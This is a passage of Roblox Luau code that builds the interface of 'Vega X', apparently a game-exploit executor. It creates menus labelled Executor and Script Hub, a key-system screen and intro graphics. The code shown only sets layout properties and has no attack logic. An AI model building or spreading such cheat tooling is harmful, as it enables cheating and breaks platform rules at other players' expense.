TitleLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TitleLabel.BackgroundTransparency = 1.000 TitleLabel.BorderSizePixel = 0 TitleLabel.Position = UDim2.new(0, 40, 0, 50) TitleLabel.Size = UDim2.new(0, 150, 0, 25) TitleLabel.Font = Enum.Font.GothamBold TitleLabel.Text = "Vega X 4.0.6" TitleLabel.TextColor3 = Color3.fromRGB(255, 255, 255) TitleLabel.TextSize = 12.000 TitleLabel.TextXAlignment = Enum.TextXAlignment.Left ScrollingFrame_3.Parent = SidebarFrame ScrollingFrame_3.Active = true ScrollingFrame_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ScrollingFrame_3.BackgroundTransparency = 1.000 ScrollingFrame_3.BorderSizePixel = 0 ScrollingFrame_3.Position = UDim2.new(0, 0, 0, 150) ScrollingFrame_3.Size = UDim2.new(1, 0, 1, -150) ScrollingFrame_3.CanvasSize = UDim2.new(0, 0, 1.5, 0) ScrollingFrame_3.ScrollBarThickness = 0 UIListLayout_3.Parent = ScrollingFrame_3 UIListLayout_3.HorizontalAlignment = Enum.HorizontalAlignment.Center UIListLayout_3.SortOrder = Enum.SortOrder.LayoutOrder UIListLayout_3.Padding = UDim.new(0, 2) UsernamePlace.Name = "UsernamePlace" UsernamePlace.Parent = ScrollingFrame_3 UsernamePlace.BackgroundColor3 = Color3.fromRGB(38, 38, 38) UsernamePlace.BorderSizePixel = 0 UsernamePlace.Position = UDim2.new(0, 0, 1, -10) UsernamePlace.Size = UDim2.new(1, 0, 0, 62) Title_7.Name = "Title" Title_7.Parent = UsernamePlace Title_7.AnchorPoint = Vector2.new(0, 0.5) Title_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Title_7.BackgroundTransparency = 1.000 Title_7.BorderSizePixel = 0 Title_7.Position = UDim2.new(0, 62, 0.5, 0) Title_7.Size = UDim2.new(0.639999986, 0, 1, -20) Title_7.Font = Enum.Font.Gotham Title_7.Text = "Hello!" Title_7.TextColor3 = Color3.fromRGB(255, 255, 255) Title_7.TextSize = 14.000 Title_7.TextWrapped = true Title_7.TextXAlignment = Enum.TextXAlignment.Left Icon.Name = "Icon" Icon.Parent = UsernamePlace Icon.BackgroundColor3 = Color3.fromRGB(195, 57, 57) Icon.BorderSizePixel = 0 Icon.Position = UDim2.new(0, 10, 0, 10) Icon.Size = UDim2.new(0, 42, 0, 42) UICorner_27.CornerRadius = UDim.new(0, 10) UICorner_27.Parent = Icon ProfileImage.Name = "ProfileImage" ProfileImage.Parent = Icon ProfileImage.AnchorPoint = Vector2.new(0.5, 0.5) ProfileImage.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ProfileImage.BackgroundTransparency = 1.000 ProfileImage.BorderSizePixel = 0 ProfileImage.Position = UDim2.new(0.5, 0, 0.5, 0) ProfileImage.Size = UDim2.new(1, 0, 1, 0) UICorner_28.CornerRadius = UDim.new(0, 10) UICorner_28.Parent = ProfileImage Choice1.Name = "Choice1" Choice1.Parent = ScrollingFrame_3 Choice1.BackgroundColor3 = Color3.fromRGB(38, 38, 38) Choice1.BorderSizePixel = 0 Choice1.Size = UDim2.new(1, 0, 0, 100) Title_8.Name = "Title" Title_8.Parent = Choice1 Title_8.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Title_8.BackgroundTransparency = 1.000 Title_8.BorderSizePixel = 0 Title_8.Position = UDim2.new(0, 62, 0, 10) Title_8.Size = UDim2.new(0.529999971, 0, 0.209999993, 20) Title_8.Font = Enum.Font.Gotham Title_8.Text = "Executor" Title_8.TextColor3 = Color3.fromRGB(255, 255, 255) Title_8.TextSize = 14.000 Title_8.TextWrapped = true Title_8.TextXAlignment = Enum.TextXAlignment.Left C1EB.Name = "C1EB" C1EB.Parent = Choice1 C1EB.AnchorPoint = Vector2.new(0.5, 1) C1EB.BackgroundColor3 = Color3.fromRGB(195, 57, 57) C1EB.BorderSizePixel = 0 C1EB.Position = UDim2.new(0.5, 0, 1, -10) C1EB.Size = UDim2.new(1, -20, 0, 30) C1EB.Font = Enum.Font.GothamBold C1EB.Text = "Open" C1EB.TextColor3 = Color3.fromRGB(255, 255, 255) C1EB.TextSize = 14.000 UICorner_29.CornerRadius = UDim.new(0, 4) UICorner_29.Parent = C1EB Icon_2.Name = "Icon" Icon_2.Parent = Choice1 Icon_2.BackgroundColor3 = Color3.fromRGB(195, 57, 57) Icon_2.BorderSizePixel = 0 Icon_2.Position = UDim2.new(0, 10, 0, 10) Icon_2.Size = UDim2.new(0, 42, 0, 42) UICorner_30.CornerRadius = UDim.new(0, 10) UICorner_30.Parent = Icon_2 ImageLabel_2.Parent = Icon_2 ImageLabel_2.AnchorPoint = Vector2.new(0.5, 0.5) ImageLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ImageLabel_2.BackgroundTransparency = 1.000 ImageLabel_2.BorderSizePixel = 0 ImageLabel_2.Position = UDim2.new(0.5, 0, 0.5, 0) ImageLabel_2.Size = UDim2.new(0.800000012, 0, 0.800000012, 0) ImageLabel_2.Image = "rbxassetid://3926307971" ImageLabel_2.ImageRectOffset = Vector2.new(764, 244) ImageLabel_2.ImageRectSize = Vector2.new(36, 36) Choice2.Name = "Choice2" Choice2.Parent = ScrollingFrame_3 Choice2.BackgroundColor3 = Color3.fromRGB(38, 38, 38) Choice2.BorderSizePixel = 0 Choice2.Size = UDim2.new(1, 0, 0, 100) Title_9.Name = "Title" Title_9.Parent = Choice2 Title_9.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Title_9.BackgroundTransparency = 1.000 Title_9.BorderSizePixel = 0 Title_9.Position = UDim2.new(0, 62, 0, 10) Title_9.Size = UDim2.new(0.529999971, 0, 0.209999993, 20) Title_9.Font = Enum.Font.Gotham Title_9.Text = "Script Hub" Title_9.TextColor3 = Color3.fromRGB(255, 255, 255) Title_9.TextSize = 14.000 Title_9.TextWrapped = true Title_9.TextXAlignment = Enum.TextXAlignment.Left C2EB.Name = "C2EB" C2EB.Parent = Choice2 C2EB.AnchorPoint = Vector2.new(0.5, 1) C2EB.BackgroundColor3 = Color3.fromRGB(195, 57, 57) C2EB.BorderSizePixel = 0 C2EB.Position = UDim2.new(0.5, 0, 1, -10) C2EB.Size = UDim2.new(1, -20, 0, 30) C2EB.Font = Enum.Font.GothamBold C2EB.Text = "Open" C2EB.TextColor3 = Color3.fromRGB(255, 255, 255) C2EB.TextSize = 14.000 UICorner_31.CornerRadius = UDim.new(0, 4) UICorner_31.Parent = C2EB Icon_3.Name = "Icon" Icon_3.Parent = Choice2 Icon_3.BackgroundColor3 = Color3.fromRGB(195, 57, 57) Icon_3.BorderSizePixel = 0 Icon_3.Position = UDim2.new(0, 10, 0, 10) Icon_3.Size = UDim2.new(0, 42, 0, 42) UICorner_32.CornerRadius = UDim.new(0, 10) UICorner_32.Parent = Icon_3 ImageLabel_3.Parent = Icon_3 ImageLabel_3.AnchorPoint = Vector2.new(0.5, 0.5) ImageLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ImageLabel_3.BackgroundTransparency = 1.000 ImageLabel_3.BorderSizePixel = 0 ImageLabel_3.Position = UDim2.new(0.5, 0, 0.5, 0) ImageLabel_3.Size = UDim2.new(0.800000012, 0, 0.800000012, 0) ImageLabel_3.Image = "rbxassetid://3926307971" ImageLabel_3.ImageRectOffset = Vector2.new(804, 404) ImageLabel_3.ImageRectSize = Vector2.new(36, 36) Choice3.Name = "Choice3" Choice3.Parent = ScrollingFrame_3 Choice3.BackgroundColor3 = Color3.fromRGB(38, 38, 38) Choice3.BorderSizePixel = 0 Choice3.Size = UDim2.new(1, 0, 0, 100) Title_10.Name = "Title" Title_10.Parent = Choice3 Title_10.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Title_10.BackgroundTransparency = 1.000 Title_10.BorderSizePixel = 0 Title_10.Position = UDim2.new(0, 62, 0, 10) Title_10.Size = UDim2.new(0.529999971, 0, 0.209999993, 20) Title_10.Font = Enum.Font.Gotham Title_10.Text = "Settings" Title_10.TextColor3 = Color3.fromRGB(255, 255, 255) Title_10.TextSize = 14.000 Title_10.TextWrapped = true Title_10.TextXAlignment = Enum.TextXAlignment.Left C3EB.Name = "C3EB" C3EB.Parent = Choice3 C3EB.AnchorPoint = Vector2.new(0.5, 1) C3EB.BackgroundColor3 = Color3.fromRGB(195, 57, 57) C3EB.BorderSizePixel = 0 C3EB.Position = UDim2.new(0.5, 0, 1, -10) C3EB.Size = UDim2.new(1, -20, 0, 30) C3EB.Font = Enum.Font.GothamBold C3EB.Text = "Open" C3EB.TextColor3 = Color3.fromRGB(255, 255, 255) C3EB.TextSize = 14.000 UICorner_33.CornerRadius = UDim.new(0, 4) UICorner_33.Parent = C3EB Icon_4.Name = "Icon" Icon_4.Parent = Choice3 Icon_4.BackgroundColor3 = Color3.fromRGB(195, 57, 57) Icon_4.BorderSizePixel = 0 Icon_4.Position = UDim2.new(0, 10, 0, 10) Icon_4.Size = UDim2.new(0, 42, 0, 42) UICorner_34.CornerRadius = UDim.new(0, 10) UICorner_34.Parent = Icon_4 ImageLabel_4.Parent = Icon_4 ImageLabel_4.AnchorPoint = Vector2.new(0.5, 0.5) ImageLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ImageLabel_4.BackgroundTransparency = 1.000 ImageLabel_4.BorderSizePixel = 0 ImageLabel_4.Position = UDim2.new(0.5, 0, 0.5, 0) ImageLabel_4.Size = UDim2.new(0.800000012, 0, 0.800000012, 0) ImageLabel_4.Image = "rbxassetid://3926307971" ImageLabel_4.ImageRectOffset = Vector2.new(324, 124) ImageLabel_4.ImageRectSize = Vector2.new(36, 36) VegaXMenuToggleFrame.Name = "VegaXMenuToggleFrame" VegaXMenuToggleFrame.Parent = VegaXAndroidUI VegaXMenuToggleFrame.BackgroundColor3 = Color3.fromRGB(0, 0, 0) VegaXMenuToggleFrame.BackgroundTransparency = 0.500 VegaXMenuToggleFrame.BorderSizePixel = 0 VegaXMenuToggleFrame.ClipsDescendants = true VegaXMenuToggleFrame.Position = UDim2.new(0, 104, 0, -32) VegaXMenuToggleFrame.Size = UDim2.new(0, 64, 0, 32) VegaXMenuToggleFrame.Visible = true VegaXMenuToggleFrame.ZIndex = 10 UICorner_35.CornerRadius = UDim.new(0, 10) UICorner_35.Parent = VegaXMenuToggleFrame VegaXMenuToggle.Name = "VegaXMenuToggle" VegaXMenuToggle.Parent = VegaXMenuToggleFrame VegaXMenuToggle.BackgroundColor3 = Color3.fromRGB(0, 0, 0) VegaXMenuToggle.BackgroundTransparency = 1.000 VegaXMenuToggle.BorderSizePixel = 0 VegaXMenuToggle.Size = UDim2.new(0, 32, 0, 32) VegaXMenuToggle.ZIndex = 11 VegaXMenuToggle.Font = Enum.Font.SourceSans VegaXMenuToggle.Text = "" VegaXMenuToggle.TextColor3 = Color3.fromRGB(0, 0, 0) VegaXMenuToggle.TextSize = 14.000 UICorner_36.CornerRadius = UDim.new(0, 10) UICorner_36.Parent = VegaXMenuToggle ImageLabel_5.Parent = VegaXMenuToggle ImageLabel_5.AnchorPoint = Vector2.new(0.5, 0.5) ImageLabel_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ImageLabel_5.BackgroundTransparency = 1.000 ImageLabel_5.BorderSizePixel = 0 ImageLabel_5.Position = UDim2.new(0.5, 0, 0.5, 0) ImageLabel_5.Size = UDim2.new(0.699999988, 0, 0.699999988, 0) ImageLabel_5.ZIndex = 11 ImageLabel_5.Image = "http://www.roblox.com/asset/?id=15861930865" DragTouch.Name = "DragTouch" DragTouch.Parent = VegaXMenuToggleFrame DragTouch.AnchorPoint = Vector2.new(1, 0) DragTouch.BackgroundColor3 = Color3.fromRGB(255, 255, 255) DragTouch.BackgroundTransparency = 1.000 DragTouch.BorderSizePixel = 0 DragTouch.Position = UDim2.new(1, 0, 0, 0) DragTouch.Size = UDim2.new(0, 32, 0, 32) DragTouch.ZIndex = 11 DragTouch.Image = "rbxassetid://3926307971" DragTouch.ImageRectOffset = Vector2.new(564, 364) DragTouch.ImageRectSize = Vector2.new(36, 36) KeySystem.Name = "KeySystem" KeySystem.Parent = VegaXAndroidUI KeySystem.AnchorPoint = Vector2.new(0, 0.5) KeySystem.BackgroundColor3 = Color3.fromRGB(0, 0, 0) KeySystem.BackgroundTransparency = 0.200 KeySystem.BorderColor3 = Color3.fromRGB(30, 30, 30) KeySystem.BorderSizePixel = 0 KeySystem.Position = UDim2.new(0, 0, 2, -20) KeySystem.Size = UDim2.new(1, 0, 1, 40) KeySystem.Visible = false MainTitle.Name = "MainTitle" MainTitle.Parent = KeySystem MainTitle.BackgroundColor3 = Color3.fromRGB(255, 255, 255) MainTitle.BackgroundTransparency = 1.000 MainTitle.BorderSizePixel = 0 MainTitle.Position = UDim2.new(0, 7, 0, 88) MainTitle.Size = UDim2.new(1, -14, 0, 21) MainTitle.Font = Enum.Font.GothamBold MainTitle.Text = "[Vega X] Key System" MainTitle.TextColor3 = Color3.fromRGB(255, 255, 255) MainTitle.TextSize = 18.000 MainTitle.TextYAlignment = Enum.TextYAlignment.Top CloseB_4.Name = "CloseB" CloseB_4.Parent = KeySystem CloseB_4.AnchorPoint = Vector2.new(1, 0) CloseB_4.BackgroundTransparency = 1.000 CloseB_4.BorderSizePixel = 0 CloseB_4.LayoutOrder = 6 CloseB_4.Position = UDim2.new(1, -5, 0, 45) CloseB_4.Size = UDim2.new(0, 25, 0, 25) CloseB_4.ZIndex = 2 CloseB_4.Image = "rbxassetid://3926307971" CloseB_4.ImageRectOffset = Vector2.new(884, 284) CloseB_4.ImageRectSize = Vector2.new(36, 36) TextBox_2.Parent = KeySystem TextBox_2.AnchorPoint = Vector2.new(0, 1) TextBox_2.BackgroundColor3 = Color3.fromRGB(31, 31, 31) TextBox_2.BackgroundTransparency = 0.200 TextBox_2.BorderSizePixel = 0 TextBox_2.Position = UDim2.new(0, 25, 1, -137) TextBox_2.Size = UDim2.new(1, -50, 0, 50) TextBox_2.ClearTextOnFocus = false TextBox_2.Font = Enum.Font.Code TextBox_2.MultiLine = true TextBox_2.PlaceholderText = "Insert the Key Here!" TextBox_2.Text = "" TextBox_2.TextColor3 = Color3.fromRGB(220, 220, 220) TextBox_2.TextSize = 16.000 UICorner_37.CornerRadius = UDim.new(0, 5) UICorner_37.Parent = TextBox_2 ApproveKeyB.Name = "ApproveKeyB" ApproveKeyB.Parent = KeySystem ApproveKeyB.Active = false ApproveKeyB.AnchorPoint = Vector2.new(0.5, 1) ApproveKeyB.BackgroundColor3 = Color3.fromRGB(195, 57, 57) ApproveKeyB.BorderSizePixel = 0 ApproveKeyB.Position = UDim2.new(0.5, 0, 1, -76) ApproveKeyB.Size = UDim2.new(0, 120, 0, 40) ApproveKeyB.Font = Enum.Font.GothamBold ApproveKeyB.Text = "Check Key" ApproveKeyB.TextColor3 = Color3.fromRGB(255, 255, 255) ApproveKeyB.TextSize = 16.000 UICorner_38.CornerRadius = UDim.new(0, 4) UICorner_38.Parent = ApproveKeyB EULALabel.Name = "EULALabel" EULALabel.Parent = KeySystem EULALabel.AnchorPoint = Vector2.new(0, 1) EULALabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) EULALabel.BackgroundTransparency = 1.000 EULALabel.BorderSizePixel = 0 EULALabel.Position = UDim2.new(0, 7, 1, -35) EULALabel.Size = UDim2.new(1, -14, 0, 21) EULALabel.Font = Enum.Font.GothamBold EULALabel.Text = "By pressing \"Get Key\", you accept to the terms of the Pelican Key System EULA." EULALabel.TextColor3 = Color3.fromRGB(255, 255, 255) EULALabel.TextSize = 12.000 GetKeyB.Name = "GetKeyB" GetKeyB.Parent = KeySystem GetKeyB.Active = false GetKeyB.AnchorPoint = Vector2.new(0.5, 1) GetKeyB.BackgroundColor3 = Color3.fromRGB(195, 57, 57) GetKeyB.BackgroundTransparency = 0.500 GetKeyB.BorderSizePixel = 0 GetKeyB.Position = UDim2.new(0.5, -125, 1, -76) GetKeyB.Size = UDim2.new(0, 120, 0, 40) GetKeyB.Font = Enum.Font.GothamBold GetKeyB.Text = "Get Key" GetKeyB.TextColor3 = Color3.fromRGB(255, 255, 255) GetKeyB.TextSize = 16.000 UICorner_39.CornerRadius = UDim.new(0, 4) UICorner_39.Parent = GetKeyB JoinDiscordB.Name = "JoinDiscordB" JoinDiscordB.Parent = KeySystem JoinDiscordB.Active = false JoinDiscordB.AnchorPoint = Vector2.new(0.5, 1) JoinDiscordB.BackgroundColor3 = Color3.fromRGB(38, 38, 38) JoinDiscordB.BorderSizePixel = 0 JoinDiscordB.Position = UDim2.new(0.5, 125, 1, -76) JoinDiscordB.Size = UDim2.new(0, 120, 0, 40) JoinDiscordB.Font = Enum.Font.GothamBold JoinDiscordB.Text = "Join Discord" JoinDiscordB.TextColor3 = Color3.fromRGB(255, 255, 255) JoinDiscordB.TextSize = 16.000 UICorner_40.CornerRadius = UDim.new(0, 4) UICorner_40.Parent = JoinDiscordB Banner_2.Name = "Banner" Banner_2.Parent = KeySystem Banner_2.AnchorPoint = Vector2.new(0.5, 0) Banner_2.BackgroundColor3 = Color3.fromRGB(195, 57, 57) Banner_2.BorderSizePixel = 0 Banner_2.ClipsDescendants = true Banner_2.Position = UDim2.new(0.5, 0, 0, 150) Banner_2.Size = UDim2.new(1, -50, 1, -345) VegaXLogo_3.Name = "VegaXLogo" VegaXLogo_3.Parent = Banner_2 VegaXLogo_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) VegaXLogo_3.BackgroundTransparency = 1.000 VegaXLogo_3.BorderSizePixel = 0 VegaXLogo_3.Position = UDim2.new(0, 10, 0, 10) VegaXLogo_3.Size = UDim2.new(0, 25, 0, 25) VegaXLogo_3.Image = "http://www.roblox.com/asset/?id=15861930865" UICorner_41.Parent = Banner_2 HappyGuy_2.Name = "HappyGuy" HappyGuy_2.Parent = Banner_2 HappyGuy_2.AnchorPoint = Vector2.new(0.5, 1) HappyGuy_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) HappyGuy_2.BackgroundTransparency = 1.000 HappyGuy_2.BorderSizePixel = 0 HappyGuy_2.Position = UDim2.new(0.5, 0, 1, 0) HappyGuy_2.Size = UDim2.new(1, 0, 0.800000012, 0) HappyGuy_2.Image = "http://www.roblox.com/asset/?id=13329667664" HappyGuy_2.ImageTransparency = 0.500 HappyGuy_2.ScaleType = Enum.ScaleType.Fit TitleLabel_2.Name = "TitleLabel" TitleLabel_2.Parent = Banner_2 TitleLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TitleLabel_2.BackgroundTransparency = 1.000 TitleLabel_2.BorderSizePixel = 0 TitleLabel_2.Position = UDim2.new(0, 40, 0, 10) TitleLabel_2.Size = UDim2.new(0, 150, 0, 25) TitleLabel_2.Font = Enum.Font.GothamBold TitleLabel_2.Text = "Happy Guy" TitleLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255) TitleLabel_2.TextSize = 12.000 TitleLabel_2.TextXAlignment = Enum.TextXAlignment.Left ScrollingBox_2.Name = "ScrollingBox" ScrollingBox_2.Parent = Banner_2 ScrollingBox_2.Active = true ScrollingBox_2.AnchorPoint = Vector2.new(0.5, 1) ScrollingBox_2.BackgroundColor3 = Color3.fromRGB(31, 31, 31) ScrollingBox_2.BackgroundTransparency = 1.000 ScrollingBox_2.BorderSizePixel = 0 ScrollingBox_2.Position = UDim2.new(0.5, 0, 1, -10) ScrollingBox_2.Size = UDim2.new(1, -20, 1, -55) ScrollingBox_2.Visible = false ScrollingBox_2.CanvasSize = UDim2.new(0, 0, 1.5, 0) ScrollingBox_2.ScrollBarThickness = 2 TextBox_3.Parent = ScrollingBox_2 TextBox_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextBox_3.BackgroundTransparency = 1.000 TextBox_3.Selectable = false TextBox_3.Size = UDim2.new(1, 0, 1, 0) TextBox_3.ZIndex = 4 TextBox_3.ClearTextOnFocus = false TextBox_3.Font = Enum.Font.Gotham TextBox_3.MultiLine = true TextBox_3.ShowNativeInput = false TextBox_3.Text = "" TextBox_3.TextColor3 = Color3.fromRGB(255, 255, 255) TextBox_3.TextSize = 16.000 TextBox_3.TextWrapped = true TextBox_3.TextXAlignment = Enum.TextXAlignment.Left TextBox_3.TextYAlignment = Enum.TextYAlignment.Top UICorner_42.CornerRadius = UDim.new(0, 5) UICorner_42.Parent = ScrollingBox_2 SubTitle_7.Name = "SubTitle" SubTitle_7.Parent = KeySystem SubTitle_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255) SubTitle_7.BackgroundTransparency = 1.000 SubTitle_7.BorderSizePixel = 0 SubTitle_7.Position = UDim2.new(0, 7, 0, 109) SubTitle_7.Size = UDim2.new(1, -14, 0, 40) SubTitle_7.Font = Enum.Font.Gotham SubTitle_7.Text = "Press \"Get Key\" to get started!" SubTitle_7.TextColor3 = Color3.fromRGB(255, 255, 255) SubTitle_7.TextSize = 14.000 SubTitle_7.TextWrapped = true SubTitle_7.TextYAlignment = Enum.TextYAlignment.Top KSMenuToggleFrame.Name = "KSMenuToggleFrame" KSMenuToggleFrame.Parent = VegaXAndroidUI KSMenuToggleFrame.AnchorPoint = Vector2.new(1, 1) KSMenuToggleFrame.BackgroundColor3 = Color3.fromRGB(0, 0, 0) KSMenuToggleFrame.BackgroundTransparency = 0.500 KSMenuToggleFrame.BorderSizePixel = 0 KSMenuToggleFrame.ClipsDescendants = true KSMenuToggleFrame.Position = UDim2.new(1, -10, 1, -10) KSMenuToggleFrame.Visible = false KSMenuToggleFrame.ZIndex = 10 UICorner_43.CornerRadius = UDim.new(0, 10) UICorner_43.Parent = KSMenuToggleFrame VegaXKSToggle.Name = "VegaXKSToggle" VegaXKSToggle.Parent = KSMenuToggleFrame VegaXKSToggle.BackgroundColor3 = Color3.fromRGB(0, 0, 0) VegaXKSToggle.BackgroundTransparency = 1.000 VegaXKSToggle.BorderSizePixel = 0 VegaXKSToggle.Size = UDim2.new(0, 32, 0, 32) VegaXKSToggle.ZIndex = 11 VegaXKSToggle.Font = Enum.Font.SourceSans VegaXKSToggle.Text = "" VegaXKSToggle.TextColor3 = Color3.fromRGB(0, 0, 0) VegaXKSToggle.TextSize = 14.000 UICorner_44.CornerRadius = UDim.new(0, 10) UICorner_44.Parent = VegaXKSToggle ImageLabel_6.Parent = VegaXKSToggle ImageLabel_6.AnchorPoint = Vector2.new(0.5, 0.5) ImageLabel_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ImageLabel_6.BackgroundTransparency = 1.000 ImageLabel_6.BorderSizePixel = 0 ImageLabel_6.Position = UDim2.new(0.5, 0, 0.5, 0) ImageLabel_6.Size = UDim2.new(0.699999988, 0, 0.699999988, 0) ImageLabel_6.ZIndex = 11 ImageLabel_6.Image = "http://www.roblox.com/asset/?id=15861930865" IntroFrame.Name = "IntroFrame" IntroFrame.Parent = VegaXAndroidUI IntroFrame.AnchorPoint = Vector2.new(0.5, 0.5) IntroFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255) IntroFrame.BackgroundTransparency = 1.000 IntroFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) IntroFrame.BorderSizePixel = 0 IntroFrame.ClipsDescendants = true IntroFrame.Position = UDim2.new(0.5, 0, 0.5, 0) IntroFrame.Size = UDim2.new(1, 0, 1, 0) BackgroundFrame.Name = "BackgroundFrame" BackgroundFrame.Parent = IntroFrame BackgroundFrame.AnchorPoint = Vector2.new(0.5, 0.5) BackgroundFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255) BackgroundFrame.BackgroundTransparency = 1.000 BackgroundFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) BackgroundFrame.BorderSizePixel = 0 BackgroundFrame.Position = UDim2.new(0.5, 0, 0.5, 0) BackgroundFrame.Rotation = 45.000 BackgroundFrame.Size = UDim2.new(1.29999995, 0, 3, 0) R1.Name = "R1" R1.Parent = BackgroundFrame R1.BackgroundColor3 = Color3.fromRGB(0, 0, 0) R1.BackgroundTransparency = 1.000 R1.BorderColor3 = Color3.fromRGB(0, 0, 0) R1.BorderSizePixel = 0 R1.Size = UDim2.new(0.075000003, 0, 0, 0) R2.Name = "R2" R2.Parent = BackgroundFrame R2.BackgroundColor3 = Color3.fromRGB(19, 6, 6) R2.BackgroundTransparency = 1.000 R2.BorderColor3 = Color3.fromRGB(0, 0, 0) R2.BorderSizePixel = 0 R2.Position = UDim2.new(0.0500000007, 0, 0, 0) R2.Size = UDim2.new(0.075000003, 0, 0, 0) R2.ZIndex = 2 R3.Name = "R3" R3.Parent = BackgroundFrame R3.BackgroundColor3 = Color3.fromRGB(39, 11, 11) R3.BackgroundTransparency = 1.000 R3.BorderColor3 = Color3.fromRGB(0, 0, 0) R3.BorderSizePixel = 0 R3.Position = UDim2.new(0.100000001, 0, 0, 0) R3.Size = UDim2.new(0.075000003, 0, 0, 0) R3.ZIndex = 3 R4.Name = "R4" R4.Parent = BackgroundFrame R4.BackgroundColor3 = Color3.fromRGB(58, 17, 17) R4.BackgroundTransparency = 1.000 R4.BorderColor3 = Color3.fromRGB(0, 0, 0) R4.BorderSizePixel = 0 R4.Position = UDim2.new(0.150000006, 0, 0, 0) R4.Size = UDim2.new(0.075000003, 0, 0, 0) R4.ZIndex = 4 R5.Name = "R5" R5.Parent = BackgroundFrame R5.BackgroundColor3 = Color3.fromRGB(78, 23, 23) R5.BackgroundTransparency = 1.000 R5.BorderColor3 = Color3.fromRGB(0, 0, 0) R5.BorderSizePixel = 0 R5.Position = UDim2.new(0.200000003, 0, 0, 0) R5.Size = UDim2.new(0.075000003, 0, 0, 0) R5.ZIndex = 5 R6.Name = "R6" R6.Parent = BackgroundFrame R6.BackgroundColor3 = Color3.fromRGB(117, 34, 34) R6.BackgroundTransparency = 1.000 R6.BorderColor3 = Color3.fromRGB(0, 0, 0) R6.BorderSizePixel = 0 R6.Position = UDim2.new(0.25, 0, 0, 0) R6.Size = UDim2.new(0.075000003, 0, 0, 0) R6.ZIndex = 6 R7.Name = "R7" R7.Parent = BackgroundFrame R7.BackgroundColor3 = Color3.fromRGB(137, 40, 40) R7.BackgroundTransparency = 1.000 R7.BorderColor3 = Color3.fromRGB(0, 0, 0) R7.BorderSizePixel = 0 R7.Position = UDim2.new(0.300000012, 0, 0, 0) R7.Size = UDim2.new(0.075000003, 0, 0, 0) R7.ZIndex = 7 R8.Name = "R8" R8.Parent = BackgroundFrame R8.BackgroundColor3 = Color3.fromRGB(156, 46, 46) R8.BackgroundTransparency = 1.000 R8.BorderColor3 = Color3.fromRGB(0, 0, 0) R8.BorderSizePixel = 0 R8.Position = UDim2.new(0.349999994, 0, 0, 0) R8.Size = UDim2.new(0.075000003, 0, 0, 0) R8.ZIndex = 8 R9.Name = "R9" R9.Parent = BackgroundFrame R9.BackgroundColor3 = Color3.fromRGB(176, 51, 51) R9.BackgroundTransparency = 1.000 R9.BorderColor3 = Color3.fromRGB(0, 0, 0) R9.BorderSizePixel = 0 R9.Position = UDim2.new(0.400000006, 0, 0, 0) R9.Size = UDim2.new(0.075000003, 0, 0, 0) R9.ZIndex = 9 R10.Name = "R10" R10.Parent = BackgroundFrame R10.BackgroundColor3 = Color3.fromRGB(195, 57, 57) R10.BackgroundTransparency = 1.000 R10.BorderColor3 = Color3.fromRGB(0, 0, 0) R10.BorderSizePixel = 0 R10.Position = UDim2.new(0.449999988, 0, 0, 0) R10.Size = UDim2.new(0.075000003, 0, 0, 0) R10.ZIndex = 10 R11.Name = "R11" R11.Parent = BackgroundFrame R11.BackgroundColor3 = Color3.fromRGB(176, 51, 51) R11.BackgroundTransparency = 1.000 R11.BorderColor3 = Color3.fromRGB(0, 0, 0) R11.BorderSizePixel = 0 R11.Position = UDim2.new(0.5, 0, 0, 0) R11.Size = UDim2.new(0.075000003, 0, 0, 0) R11.ZIndex = 11 R12.Name = "R12" R12.Parent = BackgroundFrame R12.BackgroundColor3 = Color3.fromRGB(156, 46, 46) R12.BackgroundTransparency = 1.000 R12.BorderColor3 = Color3.fromRGB(0, 0, 0) R12.BorderSizePixel = 0 R12.Position = UDim2.new(0.550000012, 0, 0, 0) R12.Size = UDim2.new(0.075000003, 0, 0, 0) R12.ZIndex = 12 R13.Name = "R13" R13.Parent = BackgroundFrame R13.BackgroundColor3 = Color3.fromRGB(137, 40, 40) R13.BackgroundTransparency = 1.000 R13.BorderColor3 = Color3.fromRGB(0, 0, 0) R13.BorderSizePixel = 0 R13.Position = UDim2.new(0.600000024, 0, 0, 0) R13.Size = UDim2.new(0.075000003, 0, 0, 0) R13.ZIndex = 13 R14.Name = "R14" R14.Parent = BackgroundFrame R14.BackgroundColor3 = Color3.fromRGB(117, 34, 34) R14.BackgroundTransparency = 1.000 R14.BorderColor3 = Color3.fromRGB(0, 0, 0) R14.BorderSizePixel = 0 R14.Position = UDim2.new(0.649999976, 0, 0, 0) R14.Size = UDim2.new(0.075000003, 0, 0, 0) R14.ZIndex = 14 R15.Name = "R15" R15.Parent = BackgroundFrame R15.BackgroundColor3 = Color3.fromRGB(98, 29, 29) R15.BackgroundTransparency = 1.000 R15.BorderColor3 = Color3.fromRGB(0, 0, 0) R15.BorderSizePixel = 0 R15.Position = UDim2.new(0.699999988, 0, 0, 0) R15.Size = UDim2.new(0.075000003, 0, 0, 0) R15.ZIndex = 15 R16.Name = "R16" R16.Parent = BackgroundFrame R16.BackgroundColor3 = Color3.fromRGB(78, 23, 23) R16.BackgroundTransparency = 1.000 R16.BorderColor3 = Color3.fromRGB(0, 0, 0) R16.BorderSizePixel = 0 R16.Position = UDim2.new(0.75, 0, 0, 0) R16.Size = UDim2.new(0.075000003, 0, 0, 0) R16.ZIndex = 16 R17.Name = "R17" R17.Parent = BackgroundFrame R17.BackgroundColor3 = 